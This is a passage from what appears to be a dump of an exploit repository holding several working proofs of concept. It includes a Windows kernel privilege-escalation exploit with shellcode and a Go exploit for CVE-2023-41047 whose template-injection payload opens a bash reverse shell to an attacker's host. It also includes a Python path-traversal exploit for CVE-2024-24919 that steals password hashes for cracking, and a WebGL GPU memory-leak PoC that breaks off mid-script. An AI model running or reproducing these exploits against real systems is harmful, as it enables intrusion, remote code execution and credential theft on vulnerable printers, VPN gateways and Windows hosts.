 }\n    ZeroMemory(pvShellCode, 0x10000);\n\n\n\n    ptagWNDFake = (PULONGLONG)((PBYTE)0x304140);\n    ptagWNDFake[0] = (ULONGLONG)0x304140;\n\n    ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10;\n\n\n\n    ptagWNDFake[6] = (ULONGLONG)0x304140;\n    ptagWNDFake[8] = 
0x305300;\n\n    ptagWNDFake[11] = (ULONGLONG)MENU_add;\n    ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230;\n    ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28;\n    ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30;\n    ptagWNDFake[71] = (ULONGLONG)0x000004;\n\n\n    ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300);\n    ptagWNDFake1[1] = (ULONGLONG)0x11;\n    ptagWNDFake1[2] = (ULONGLONG)0x305320;\n    ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000;\n    ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000;\n    ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;\n\n\n    ptagWNDFake1[14] = (ULONGLONG)0x306500;\n    ptagWNDFake1[16] = (ULONGLONG)305400;\n\n\n    ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500);\n    ptagWNDFake1[11] = (ULONGLONG)0x306600;\n\n\n\n    WNDCLASSEX WndClass = { 0 };\n    WndClass.cbSize = sizeof(WNDCLASSEX);\n    WndClass.lpfnWndProc = DefWindowProc;\n    WndClass.style = CS_VREDRAW | CS_HREDRAW;\n    WndClass.cbWndExtra = 0xe0;\n    WndClass.hInstance = NULL;\n    WndClass.lpszMenuName = NULL;\n    WndClass.lpszClassName = L\"NormalClass\";\n    \n    RegisterClassEx(&WndClass);\n\n    for (int i = 0; i < 0x200; i++)\n    {\n        HMENUL_list[i] = CreateMenu();\n    }\n    for (int i = 0; i < 0x100; i++)\n    {\n        HWND_list[i] = CreateWindowEx(NULL, L\"NormalClass\", NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL);\n\n    }\n    for (int i = 0; i < 0x100; i++)\n    {\n       \n\n        SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000);\n\n        SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000);\n\n    }\n    \n\n    for (int i = 0x20; i < 0x60; i++)\n    {\n        if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], 0x01)== 0x250)\n        {\n            if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + 1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) == 0x250)\n            
{\n                HWND_add = (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01);\n                max = i * 2;\n                break;\n            }\n        }\n        if (i == 0x5f)\n        {\n            HWND_add = 0;\n        }\n\n    }\n    \n    ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;\n\n\n    DestroyWindow(HWND_list[max]);\n    \n    createclass();\n\n\n    \n    // Create a fake spmenu\n    PVOID hHeap = (PVOID)0x302000;\n\n    g_pFakeMenu = (tagMENU*)(PVOID)0x302000;\n    g_pFakeMenu->ref = (PVOID)0x302300;\n    *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu;\n    // cItems = 1\n    g_pFakeMenu->obj28 = (PVOID)0x302200;\n    *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1;\n    // rgItems\n    g_pFakeMenu->rgItems = (PVOID)0x304000;\n    // cx / cy must > 0\n    g_pFakeMenu->flag1 = 1;\n    g_pFakeMenu->flag2 = 1;\n    g_pFakeMenu->cxMenu = 1;\n    g_pFakeMenu->cyMenu = 1;\n\n\n    //\n    \n}\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)\n{\n    ULONGLONG gsValue = 0;\n    unsigned char shellcode[] = \"\\x65\\x48\\x8B\\x04\\x25\\x30\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xc3\";\n\n    LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n    if (executableMemory == NULL) {\n        return 1;\n    }\n    memcpy(executableMemory, shellcode, sizeof(shellcode));\n    \n    gsValue = ((ULONGLONG(*)())executableMemory)();\n    gsValue = gsValue + 0x800;\n    GS_hanlde = (PULONGLONG)(PBYTE)gsValue;\n    GS_off = GS_hanlde[5];\n\n    char str[0xb8] = \"\";\n    memset(str, 0x41, 0xa8);\n    g_NtUserEnableMenuItem = (NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA(\"win32u.dll\"), \"NtUserEnableMenuItem\");\n    g_NtUserSetClassLongPtr = (NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA(\"win32u.dll\"), \"NtUserSetClassLongPtr\");\n    g_NtUserCreateAcceleratorTable = 
(NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA(\"win32u.dll\"), \"NtUserCreateAcceleratorTable\");\n    g_pfnNtUserConsoleControl = (fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA(\"win32u.dll\"), \"NtUserConsoleControl\");\n\n    WNDCLASS wc = { 0 };\n\n    wc.lpfnWndProc = WndProc;\n    wc.hInstance = hInstance;\n    wc.lpszClassName = TEXT(\"EnableMenuItem\");\n\n    RegisterClass(&wc);\n\n    HWND hWnd = CreateWindow(\n        wc.lpszClassName,\n        TEXT(\"EnableMenuItem\"),\n        WS_OVERLAPPEDWINDOW,\n        CW_USEDEFAULT,\n        CW_USEDEFAULT,\n        400, 300,\n        NULL,\n        NULL,\n        hInstance,\n        NULL\n    );\n\n    if (!hWnd) return FALSE;\n\n    ///\n\n\n    hSystemMenu = GetSystemMenu(hWnd, FALSE);\n\n    hSubMenu = CreatePopupMenu(); \n    MENU_add = GetMenuHandle(hSubMenu);\n    hMenuB = CreateMenu();\n\n    buildmem();\n    if (HWND_add == 0)\n    {\n        return 0;\n    }\n\n\n    AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT(\"0\"));\n    AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT(\"1\"));\n\n    DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND);\n\n    AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L\"Menu A\");\n\n    AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L\"Menu B\");\n\n\n    \n    ShowWindow(hWnd, nCmdShow);\n    UpdateWindow(hWnd);\n\n    flag = 1;\n    g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01);\n\n    exploit();\n\n    MSG msg = { 0 };\n\n    while (GetMessage(&msg, NULL, 0, 0))\n    {\n        TranslateMessage(&msg);\n        DispatchMessage(&msg);\n    }\n\n    return (int)msg.wParam;\n}\n\nLRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)\n{\n    switch (message)\n    {\n    case WM_DESTROY:\n        PostQuitMessage(0);\n        return 0;\n    case 0xae:\n        switch (wParam)\n        {\n        case 0x1000:\n            if (flag)\n            {\n                int itemCount = GetMenuItemCount(hMenuB);  \n\n                for 
(int i = itemCount - 1; i >= 0; i--) {\n                    RemoveMenu(hMenuB, i, MF_BYPOSITION);\n                }\n                DestroyMenu(hSubMenu);\n                xxReallocPopupMenu();\n            }\n        case 0x1001:\n            if (flag)\n            {\n                int itemCount = GetMenuItemCount(hMenuB);  \n\n                for (int i = itemCount - 1; i >= 0; i--) {\n                    RemoveMenu(hMenuB, i, MF_BYPOSITION);\n                }\n                DestroyMenu(hSubMenu);\n                xxReallocPopupMenu();\n            }\n\n            return 0;\n        }\n        break;\n\n\n    }\n\n    return DefWindowProc(hWnd, message, wParam, lParam);\n}\nint syytem()\n{\n    SECURITY_ATTRIBUTES     sa;\n    HANDLE                  hRead, hWrite;\n    byte                    buf[40960] = { 0 };\n    STARTUPINFOW            si;\n    PROCESS_INFORMATION     pi;\n    DWORD                   bytesRead;\n    RtlSecureZeroMemory(&si, sizeof(si));\n    RtlSecureZeroMemory(&pi, sizeof(pi));\n    RtlSecureZeroMemory(&sa, sizeof(sa));\n    int br = 0;\n    sa.nLength = sizeof(SECURITY_ATTRIBUTES);\n    sa.lpSecurityDescriptor = NULL;\n    sa.bInheritHandle = TRUE;\n    if (!CreatePipe(&hRead, &hWrite, &sa, 0))\n    {\n        return -3;\n    }\n\n    si.cb = sizeof(STARTUPINFO);\n    GetStartupInfoW(&si);\n    si.hStdError = hWrite;\n    si.hStdOutput = hWrite;\n    si.wShowWindow = SW_HIDE;\n    si.lpDesktop = L\"WinSta0\\\\Default\";\n    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;\n    wchar_t cmd[4096] = { L\"cmd.exe\" };\n\n    if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))\n    {\n        CloseHandle(hWrite);\n        CloseHandle(hRead);\n        printf(\"[!] CreateProcessW Failed![%lx]\\n\", GetLastError());\n        return -2;\n    }\n    CloseHandle(hWrite);\n\n}\n"
  },
  {
    "path": "CVE-2023-41047/CVE-2023-41047.go",
    "content": "package main\n\nimport (\n\t\"crypto/tls\"\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"os\"\n\t\"strings\"\n\t\"sync\"\n)\n\nvar (\n\tPROXYURL = \"\"\n)\n\nconst CSRFTOKEN = \"ImU4ZmY1NDhlZTU1ZGI5M2I2MjA3YmZhYjAxY2QzOWQxOTRiN2Q0YTgi.ZUn0tg.OEMZhA3pw-YZTkm7INGV0FBBjZg\"\n\nfunc getLoginCookie(uri string) string {\n\turi += \"/api/login\"\n\tproxy, _ := url.Parse(PROXYURL)\n\ttr := &http.Transport{\n\t\tProxy:           http.ProxyURL(proxy),\n\t\tTLSClientConfig: &tls.Config{InsecureSkipVerify: true},\n\t}\n\tclient := &http.Client{\n\t\tTransport: tr,\n\t}\n\n\tdata := `{\"user\":\"admin\",\"pass\":\"admin\",\"remember\":false}`\n\n\treq, err := http.NewRequest(\"POST\", uri, strings.NewReader(data))\n\n\tif err != nil {\n\t\tlog.Println(\"Error creating request:\", err)\n\t}\n\n\treq.Header.Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\t//req.Header.Set(\"X-CSRF-Token\", CSRFTOKEN)\n\t//req.Header.Set(\"Cookie\", \"csrf_token_P5000=\"+CSRFTOKEN)\n\n\tresp, err := client.Do(req)\n\n\tif err != nil {\n\t\tlog.Println(\"Error making request:\", err)\n\t}\n\n\tdefer resp.Body.Close()\n\n\tif resp.StatusCode != http.StatusOK {\n\t\tlog.Printf(\"HTTP request failed with status code: %d\\n\", resp.StatusCode)\n\t}\n\n\tcookies := resp.Cookies()\n\tif len(cookies) == 0 {\n\t\tlog.Println(\"No cookies found in the response.\")\n\t}\n\n\tcookieStr := \"\"\n\n\tfor _, cookie := range cookies {\n\t\tif cookie.Name == \"session_P5000\" {\n\t\t\tcookieStr = \"csrf_token_P5000= \" + CSRFTOKEN + \";\" + cookie.Name + \"=\" + cookie.Value\n\t\t}\n\t\t//log.Printf(\"Name: %s, Value: %s\\n\", cookie.Name, cookie.Value)\n\t}\n\n\treturn cookieStr\n}\n\nfunc setRequest(uri string, cookie string, payload string, types int, wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\tif types == 0 {\n\t\turi += \"/api/settings\"\n\t} else if types == 1 {\n\t\turi += \"/api/connection\"\n\t}\n\n\tproxy, _ := url.Parse(PROXYURL)\n\ttr := 
&http.Transport{\n\t\tProxy:           http.ProxyURL(proxy),\n\t\tTLSClientConfig: &tls.Config{InsecureSkipVerify: true},\n\t}\n\tclient := &http.Client{\n\t\tTransport: tr,\n\t}\n\n\treq, err := http.NewRequest(\"POST\", uri, strings.NewReader(payload))\n\n\tif err != nil {\n\t\tlog.Println(\"Error creating request:\", err)\n\t}\n\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\treq.Header.Set(\"X-CSRF-Token\", CSRFTOKEN)\n\treq.Header.Set(\"Cookie\", cookie)\n\n\t_, err = client.Do(req)\n\n\tif err != nil {\n\t\tlog.Println(\"Error making request:\", err)\n\t}\n\n\t//defer resp.Body.Close()\n\n\t//log.Println(resp.StatusCode)\n}\n\nfunc main() {\n\n\tif len(os.Args) <= 4 {\n\t\tfmt.Println(\"Usage: ./CVE-2023-41047 <target> <proxyUrl> <reverse IP> <reverse PORT>\")\n\t\treturn\n\t}\n\n\turi := os.Args[1]\n\tPROXYURL = os.Args[2]\n\treverseIP := os.Args[3]\n\treversePort := os.Args[4]\n\n\tcookie := getLoginCookie(uri)\n\n\tvar wg sync.WaitGroup\n\twg.Add(1)\n\n\tlog.Println(\"[*] Start...\")\n\t// Turn on virtual printer\n\tpayload := `{\"plugins\":{\"virtual_printer\":{\"enabled\":true}},\"temperature\":{\"profiles\":[{\"name\":\"ABS\",\"extruder\":210,\"bed\":100,\"chamber\":null},{\"name\":\"PLA\",\"extruder\":180,\"bed\":60,\"chamber\":null}]}}`\n\tgo setRequest(uri, cookie, payload, 0, &wg)\n\tlog.Println(\"[+] Step 1 finish...\")\n\t// Set evil gcode\n\tpayload = `{\"scripts\":{\"gcode\":{\"afterPrinterConnected\":\"{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].eval(\\\"__import__('os').popen('bash -c \\\\\\\"bash -i  >&/dev/tcp/` + reverseIP + `/` + reversePort + ` 0>&1\\\\\\\"').read()\\\") }} {% endif %} {% endfor %}\"}},\"temperature\":{\"profiles\":[{\"name\":\"ABS\",\"extruder\":210,\"bed\":100,\"chamber\":null},{\"name\":\"PLA\",\"extruder\":180,\"bed\":60,\"chamber\":null}]}}`\n\tgo setRequest(uri, cookie, payload, 0, &wg)\n\tlog.Println(\"[+] Step 2 
finish...\")\n\n\tpayload = `{\"port\":\"AUTO\",\"baudrate\":0,\"printerProfile\":\"_default\",\"autoconnect\":false,\"command\":\"connect\"}`\n\tgo setRequest(uri, cookie, payload, 1, &wg)\n\tlog.Printf(\"[+] Step 3 reverse: tcp://%s:%s\", reverseIP, reversePort)\n\tpayload = `{\"command\":\"disconnect\"}`\n\tgo setRequest(uri, cookie, payload, 1, &wg)\n\n\twg.Wait()\n}\n"
  },
  {
    "path": "CVE-2024-24919/exp.py",
    "content": "\nimport argparse\nimport requests\nfrom urllib3.exceptions import InsecureRequestWarning\nimport re\nimport argparse\n\n\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n\ndef parse_bin_data(bin_data):\n\n    internal_password_pattern = re.compile(rb\":internal_passw.{3}ord \\(([^)]+)\\)\", re.DOTALL)\n    internal_password_matches = list(internal_password_pattern.finditer(bin_data))\n    results = []\n\n    for match in internal_password_matches:\n        internal_password = match.group(1).decode('utf-8', errors='ignore').strip()\n\n        if internal_password:\n            preceding_text = bin_data[:match.start()]\n            name_pattern = re.compile(rb\":name \\(([^)]+)\\)\", re.DOTALL)\n            name_matches = list(name_pattern.finditer(preceding_text))\n\n            if name_matches:\n                name = name_matches[-1].group(1).decode('utf-8', errors='ignore').strip()\n\n                results.append({\n                    'name': name,\n                    'internal_password': internal_password\n                })\n    return results\n\ndef fget(url,filename):\n\n    session = requests.Session()\n\n    rawBody = \"/CSHELL/../../../../../../../{}\".format(filename)\n    headers = {\"Sec-Ch-Ua\":\"\\\"Chromium\\\";v=\\\"125\\\", \\\"Not.A/Brand\\\";v=\\\"24\\\"\",\"Accept\":\"*/*\",\"Sec-Ch-Ua-Platform\":\"\\\"macOS\\\"\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36\",\"Referer\":\"https://192.168.161.110/sslvpnc/Portal/Main\",\"Connection\":\"keep-alive\",\"Sec-Fetch-Site\":\"same-origin\",\"Sec-Fetch-Dest\":\"script\",\"Accept-Encoding\":\"gzip, deflate, br\",\"Accept-Language\":\"zh-CN,zh;q=0.9\",\"Sec-Ch-Ua-Mobile\":\"?0\",\"Sec-Fetch-Mode\":\"no-cors\"}\n    response = session.get(\"{}/clients/MyCRL\".format(url), data=rawBody, headers=headers,verify=False)\n\n    s_filename = filename.split(\"/\")[-1]\n    if 
int(response.status_code)==200:\n        print('[+] The vulnerability exists, and the file will be saved locally.')\n        with open(s_filename, 'wb') as file:\n            file.write(response.content)\n        if \"fwauth.NDB\" in filename:\n            result = parse_bin_data(response.content)\n\n            print(\"[!] You can use hashcat for brute-forcing.\")\n            print(\"[!] The type of hash is DES(Unix).\")\n            for entry in result:\n                print(\"[+] \" + f\"Username: {entry['name']}, Password_Hash: {entry['internal_password']}\")\n    else:\n        print('[!] The target is inappropriate.')\n        exit()\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(dest = \"url\")\nparser.add_argument(dest = \"filename\")\n\nargs = parser.parse_args()\n\n\nfget(args.url,args.filename)\n"
  },
  {
    "path": "CVE-2026-5283/poc.html",
    "content": "<!DOCTYPE html>\n<html><head><title>CVE-2026-5283: GPU Address Leak</title>\n<style>\nbody{font-family:monospace;background:#111;color:#ddd;margin:20px}\ncanvas{border:1px solid #555;margin:3px}\npre{background:#0a0a0a;padding:10px;max-height:600px;overflow:auto;font-size:11px}\n.red{color:#f44;font-weight:bold}.grn{color:#4f4}.yel{color:#ff0}.cyan{color:#0ff}\n</style>\n</head>\n<body>\n<h3>CVE-2026-5283: GPU Internal Address Leak</h3>\n<div id=\"canvases\"></div>\n<pre id=\"log\"></pre>\n<script>\nconst L=s=>{const e=document.getElementById('log');e.innerHTML+=s+'\\n';e.scrollTop=e.scrollHeight};\nconst gl=document.createElement('canvas').getContext('webgl2');\nif(!gl){L('No WebGL2');throw'x'}\nconst dbg=gl.getExtension('WEBGL_debug_renderer_info');\nL('Renderer: '+(dbg?gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL):gl.getParameter(gl.RENDERER)));\n\nconst SIZE=512, LAYERS=8, CLEAR_LAYER=3;\n\n/*\n * Strategy: GPU driver stores internal metadata (texture descriptors,\n * buffer descriptors, sampler states, render target info) in the same\n * GPU heap as texture data. 
These contain GPU virtual addresses.\n *\n * Phase 1: Create LOTS of GPU objects to generate internal metadata\n * Phase 2: Delete everything → metadata memory freed to GPU heap\n * Phase 3: Allocate array texture → reuses freed metadata memory\n * Phase 4: Trigger CVE-2026-5283 → read uninitialized layers\n * Phase 5: Scan leaked data for address-like patterns\n */\n\n/* ---- Phase 1: Create many GPU objects to spray internal metadata ---- */\nL('\\n[Phase 1] Creating GPU objects to spray driver metadata...');\n\nconst textures=[], fbos=[], rbs=[], bufs=[], samplers=[], vaos=[];\n\n/* Many textures with various formats → texture descriptors contain base_addr */\nfor(let i=0;i<100;i++){\n    const t=gl.createTexture();\n    gl.bindTexture(gl.TEXTURE_2D,t);\n    const sz=[64,128,256,512][i%4];\n    const fmt=[gl.RGBA8,gl.RGBA16F,gl.RGB8,gl.RG8][i%4];\n    const tp=[gl.UNSIGNED_BYTE,gl.HALF_FLOAT,gl.UNSIGNED_BYTE,gl.UNSIGNED_BYTE][i%4];\n    const bf=[gl.RGBA,gl.RGBA,gl.RGB,gl.RG][i%4];\n    gl.texImage2D(gl.TEXTURE_2D,0,fmt,sz,sz,0,bf,tp,null);\n    gl.texParameteri(gl.TEXTURE_2D,gl.TEXTURE_MIN_FILTER,gl.LINEAR_MIPMAP_LINEAR);\n    gl.generateMipmap(gl.TEXTURE_2D);\n    textures.push(t);\n}\nL('  100 textures with mipmaps');\n\n/* FBOs with attachments → render target descriptors */\nfor(let i=0;i<50;i++){\n    const f=gl.createFramebuffer();\n    gl.bindFramebuffer(gl.FRAMEBUFFER,f);\n    if(textures[i])\n        gl.framebufferTexture2D(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,gl.TEXTURE_2D,textures[i],0);\n    gl.bindFramebuffer(gl.FRAMEBUFFER,null);\n    fbos.push(f);\n}\nL('  50 FBOs');\n\n/* Renderbuffers → internal storage descriptors */\nfor(let i=0;i<50;i++){\n    const r=gl.createRenderbuffer();\n    gl.bindRenderbuffer(gl.RENDERBUFFER,r);\n    gl.renderbufferStorage(gl.RENDERBUFFER,[gl.RGBA8,gl.DEPTH24_STENCIL8,gl.DEPTH_COMPONENT16][i%3],[64,128,256][i%3],[64,128,256][i%3]);\n    rbs.push(r);\n}\nL('  50 renderbuffers');\n\n/* Buffers with data → buffer 
descriptors contain GPU addresses */\nfor(let i=0;i<100;i++){\n    const b=gl.createBuffer();\n    gl.bindBuffer(gl.ARRAY_BUFFER,b);\n    gl.bufferData(gl.ARRAY_BUFFER,[256,1024,4096,16384][i%4],gl.DYNAMIC_DRAW);\n    bufs.push(b);\n}\nL('  100 buffers');\n\n/* Samplers → sampler state objects */\nfor(let i=0;i<30;i++){\n    const s=gl.createSampler();\n    gl.samplerParameteri(s,gl.TEXTURE_MIN_FILTER,[gl.NEAREST,gl.LINEAR,gl.LINEAR_MIPMAP_LINEAR][i%3]);\n    gl.samplerParameteri(s,gl.TEXTURE_WRAP_S,[gl.REPEAT,gl.CLAMP_TO_EDGE,gl.MIRRORED_REPEAT][i%3]);\n    gl.bindSampler(i%4,s);\n    samplers.push(s);\n}\nL('  30 samplers');\n\n/* VAOs → vertex attrib state */\nfor(let i=0;i<30;i++){\n    const v=gl.createVertexArray();\n    gl.bindVertexArray(v);\n    if(bufs[i]){\n        gl.bindBuffer(gl.ARRAY_BUFFER,bufs[i]);\n        gl.vertexAttribPointer(0,4,gl.FLOAT,false,0,0);\n        gl.enableVertexAttribArray(0);\n    }\n    vaos.push(v);\n}\ngl.bindVertexArray(null);\nL('  30 VAOs');\n\n/* Force GPU to process all object creation */\ngl.finish();\n\n/* Also render into some FBOs to generate render target metadata */\nfor(let i=0;i<20;i++){\n    gl.bindFramebuffer(gl.FRAMEBUFFER,fbos[i]);\n    if(gl.checkFramebufferStatus(gl.FRAMEBUFFER)===gl.FRAMEBUFFER_COMPLETE){\n        gl.viewport(0,0,64,64);\n        gl.clearColor(Math.random(),Math.random(),Math.random(),1);\n        gl.clear(gl.COLOR_BUFFER_BIT);\n    }\n}\ngl.bindFramebuffer(gl.FRAMEBUFFER,null);\ngl.viewport(0,0,SIZE,SIZE);\ngl.finish();\nL('  Rendered to 20 FBOs');\n\n/* ---- Phase 2: Delete EVERYTHING to free metadata back to GPU heap ---- */\nL('\\n[Phase 2] Deleting all objects → driver metadata freed to GPU heap...');\n\nfor(const v of vaos) gl.deleteVertexArray(v);\nfor(const s of samplers){gl.deleteSampler(s);}\nfor(const f of fbos) gl.deleteFramebuffer(f);\nfor(const r of rbs) gl.deleteRenderbuffer(r);\nfor(const b of bufs) gl.deleteBuffer(b);\nfor(const t of textures) 
gl.deleteTexture(t);\ngl.finish();\nL('  Deleted 100 tex + 50 FBO + 50 RB + 100 buf + 30 sampler + 30 VAO');\n\n/* ---- Phase 3: Allocate array texture → reuse freed metadata memory ---- */\nL('\\n[Phase 3] Allocating target array texture...');\nconst tex2=gl.createTexture();\ngl.bindTexture(gl.TEXTURE_2D_ARRAY,tex2);\ngl.texImage3D(gl.TEXTURE_2D_ARRAY,0,gl.RGBA8,SIZE,SIZE,LAYERS,0,gl.RGBA,gl.UNSIGNED_BYTE,null);\n\n/* ---- Phase 4: Trigger CVE-2026-5283 ---- */\nconst clearFBO=gl.createFramebuffer();\ngl.bindFramebuffer(gl.FRAMEBUFFER,clearFBO);\ngl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,CLEAR_LAYER);\ngl.clearColor(0,1,0,1);\ngl.clear(gl.COLOR_BUFFER_BIT);\ngl.bindFramebuffer(gl.FRAMEBUFFER,null);\ngl.deleteFramebuffer(clearFBO);\nL('[Phase 4] Cleared layer '+CLEAR_LAYER+' only → bug triggered');\n\n/* ---- Phase 5: Read + scan for GPU addresses ---- */\nL('\\n[Phase 5] Scanning leaked data for GPU addresses...');\nlet totalLeaked=0;\nconst leakedData=[];\n\nfor(let layer=0;layer<LAYERS;layer++){\n    const readFBO=gl.createFramebuffer();\n    gl.bindFramebuffer(gl.FRAMEBUFFER,readFBO);\n    gl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,layer);\n    const px=new Uint8Array(SIZE*SIZE*4);\n    gl.readPixels(0,0,SIZE,SIZE,gl.RGBA,gl.UNSIGNED_BYTE,px);\n    gl.bindFramebuffer(gl.FRAMEBUFFER,null);\n    gl.deleteFramebuffer(readFBO);\n\n    let nonzero=0;\n    for(let i=0;i<px.length;i++) if(px[i]!==0) nonzero++;\n\n    if(layer===CLEAR_LAYER){L('  Layer '+layer+': CLEARED');continue}\n    if(nonzero===0){L('  Layer '+layer+': <span class=\"grn\">zeros</span>');continue}\n\n    totalLeaked+=nonzero;\n    leakedData.push({layer,px});\n    L('  Layer '+layer+': <span class=\"red\">LEAKED '+nonzero+' bytes</span>');\n\n    const u32=new Uint32Array(px.buffer);\n\n    /* Scan for address-like patterns:\n     * GPU virtual addresses on ARM Mali: typically 0x00000000-0x0000FFFF (low) or page-aligned\n     * GPU virtual 
addresses on Adreno: various ranges\n     * Look for: page-aligned values, non-zero upper bits, pointer-like patterns */\n\n    /* Pattern 1: Page-aligned values (multiple of 0x1000) */\n    let pageAligned=0;const pageAddrs=[];\n    for(let j=0;j<u32.length;j++){\n        if(u32[j]!==0 && (u32[j]&0xFFF)===0 && u32[j]<0xFFFF0000){\n            pageAligned++;\n            if(pageAddrs.length<8) pageAddrs.push('0x'+u32[j].toString(16).padStart(8,'0'));\n        }\n    }\n    if(pageAligned>5){\n        L('    <span class=\"cyan\">Page-aligned addresses: '+pageAligned+'</span>');\n        L('    <span class=\"cyan\">  '+pageAddrs.join(', ')+'</span>');\n    }\n\n    /* Pattern 2: Values in typical GPU VA ranges */\n    let gpuVA=0;const gpuAddrs=[];\n    for(let j=0;j<u32.length;j++){\n        const v=u32[j];\n        /* Common GPU VA ranges on mobile: 0x10000-0x80000000 */\n        if(v>=0x10000 && v<0x80000000 && v!==0x00FF00FF && v!==0xFF00FF00){\n            gpuVA++;\n            if(gpuAddrs.length<8) gpuAddrs.push('0x'+v.toString(16).padStart(8,'0'));\n        }\n    }\n    if(gpuVA>20){\n        L('    <span class=\"cyan\">GPU VA range values: '+gpuVA+'</span>');\n        L('    <span class=\"cyan\">  '+gpuAddrs.join(', ')+'</span>');\n    }\n\n    /* Pattern 3: Repeating pointer-like pairs (common in descriptor tables) */\n    let pairCount=0;const pairs=[];\n    for(let j=0;j<u32.length-1;j++){\n        const a=u32[j],b=u32[j+1];\n        if(a>=0x1000 && a<0x80000000 && b>=0x1000 && b<0x80000000 &&\n           Math.abs(a-b)<0x100000 && a!==b){\n            pairCount++;\n            if(pairs.length<4) pairs.push('(0x'+a.toString(16)+', 0x'+b.toString(16)+')');\n        }\n    }\n    if(pairCount>5){\n        L('    <span class=\"cyan\">Address pairs (descriptors?): '+pairCount+'</span>');\n        L('    <span class=\"cyan\">  '+pairs.join(', ')+'</span>');\n    }\n\n    /* Pattern 4: Non-trivial u32 values (not 0, not 0xFF, not 0xFFFF) */\n    const 
histogram={};\n    for(let j=0;j<u32.length;j++){\n        const v=u32[j];\n        if(v!==0 && v!==0xFF && v!==0xFF00 && v!==0xFF00FF && v!==0x00FF00FF &&\n           v!==0xFF00FF00 && v!==0xFFFFFFFF && v!==0xFF000000 && v!==0x00FF0000){\n            histogram[v]=(histogram[v]||0)+1;\n        }\n    }\n    const unique=Object.keys(histogram).length;\n    if(unique>100){\n        L('    <span class=\"cyan\">Unique non-trivial u32: '+unique+' (rich metadata!)</span>');\n        /* Show top repeated values — likely descriptor fields */\n        const sorted=Object.entries(histogram).sort((a,b)=>b[1]-a[1]).slice(0,5);\n        for(const[v,c]of sorted){\n            L('    <span class=\"yel\">  0x'+parseInt(v).toString(16).padStart(8,'0')+' × '+c+'</span>');\n        }\n    }\n\n    /* Entropy */\n    const hist=new Array(256).fill(0);\n    for(let i=0;i<px.length;i++) hist[px[i]]++;\n    let ent=0;\n    for(let i=0;i<256;i++){if(hist[i]>0){const p=hist[i]/px.length;ent-=p*Math.log2(p)}}\n    L('    Entropy: '+ent.toFixed(2)+' bits'+(ent>4?' <span class=\"red\">(VERY HIGH)</span>':ent>2?' 
<span class=\"yel\">(moderate)</span>':''));\n\n    /* Hex dump — first 128 bytes as both hex and u32 */\n    L('    Raw hex: '+Array.from(px.slice(0,64)).map(b=>b.toString(16).padStart(2,'0')).join(' '));\n    const u32_sample=new Uint32Array(px.buffer,0,16);\n    L('    As u32: '+Array.from(u32_sample).map(v=>'0x'+v.toString(16).padStart(8,'0')).join(' '));\n}\n\n/* Visualize */\nconst container=document.getElementById('canvases');\nfor(const{layer,px}of leakedData){\n    const c=document.createElement('canvas');c.width=256;c.height=256;\n    container.appendChild(c);const ctx=c.getContext('2d');\n    const img=ctx.createImageData(256,256);const sc=SIZE/256;\n    for(let y=0;y<256;y++)for(let x=0;x<256;x++){\n        const si=(Math.floor(y*sc)*SIZE+Math.floor(x*sc))*4,di=(y*256+x)*4;\n        